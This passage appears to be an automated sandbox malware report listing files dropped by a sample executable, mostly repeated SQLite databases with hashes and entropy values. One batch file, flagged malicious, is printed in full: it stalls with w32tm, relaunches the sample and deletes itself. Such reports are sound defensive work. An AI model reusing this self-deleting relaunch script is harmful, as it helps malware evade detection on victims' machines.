                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):1.3909341910495931
                                                                    Encrypted:false
                                                                    SSDEEP:48:ToyFawNLopFgU10XJBjKwsBjAFMtt/qEM0g9gingQeroAsaC7cUXt9P:cyxe8OwsiFMttSzefroYC7J9P
                                                                    MD5:1EB30D95ED94CA01369986C3811A0591
                                                                    SHA1:D7277FF6C5D5F55A4B0576045C2928D7501E7AFC
                                                                    SHA-256:CA8D4F98E4AD0ED1F66819E90024EB527A7A46DC26D84FB9FF5F1829B6331F46
                                                                    SHA-512:D5C8BA028977ABA2416D2C02D50FD2535F646003D8F443A01E00C6FC9385F16A6C051502D3947CABF592C619E3E0A22EC586AD57876E517C7B5BB749D396ABA7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):25
                                                                    Entropy (8bit):4.323856189774723
                                                                    Encrypted:false
                                                                    SSDEEP:3:q4TMWCU:5TMWCU
                                                                    MD5:951583D11D917E8650F7250A22DF643F
                                                                    SHA1:C8DB8DB7C67064AEE14FD5311A5076A53F4581B6
                                                                    SHA-256:C8C508111F8145A38B73CA24B7C38C9AC7D6989F0DC94001E9F411CB0B95298D
                                                                    SHA-512:83DD2E5D02CFFD14222092D100A0EC6C8E4457C049F0A973468C909B087AF472C0952B3AAC88D6063E79B19D66E440D77AB76287DE9D1CA236F8877B1B3FCB5C
                                                                    Malicious:false
                                                                    Preview:ZRP3bp1DOMzAbto2L4o3wBIL6
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):49152
                                                                    Entropy (8bit):0.8180424350137764
                                                                    Encrypted:false
                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):221
                                                                    Entropy (8bit):5.18683981785612
                                                                    Encrypted:false
                                                                    SSDEEP:6:hCijTg3Nou1SV+DE1cSRr4bKOZG1cNwi23fvtn:HTg9uYDEf4iZHt
                                                                    MD5:0C7F3770BD7C56874674D930B80AADE9
                                                                    SHA1:8A31310AAEA85FB2F5EDEDF78F8A347CA2604068
                                                                    SHA-256:9B2D7BE9035ED4651F8064F4663C1E18A3815774F56665BF2B39C10962E59EC7
                                                                    SHA-512:98D6DDA9AD8FFB2817C3C3D492298869B0A52CA33B22C34CB6E24167099C4E243A7EC24C81D2229D5C6BE508930CDBFD35659797B234BB49B19046044D76FF5B
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Desktop\jW5TA1J9Z1.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\VTnJCG0P6y.bat"
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.137181696973627
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                    MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                    SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                    SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                    SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.848598812124929
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                    MD5:9664DAA86F8917816B588C715D97BE07
                                                                    SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                    SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                    SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):98304
                                                                    Entropy (8bit):0.08235737944063153
                                                                    Encrypted:false
                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.1215420383712111
                                                                    Encrypted:false
                                                                    SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                    MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                    SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                    SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                    SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                    Category:dropped
                                                                    Size (bytes):114688
                                                                    Entropy (8bit):0.9746603542602881
                                                                    Encrypted:false
                                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\jW5TA1J9Z1.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
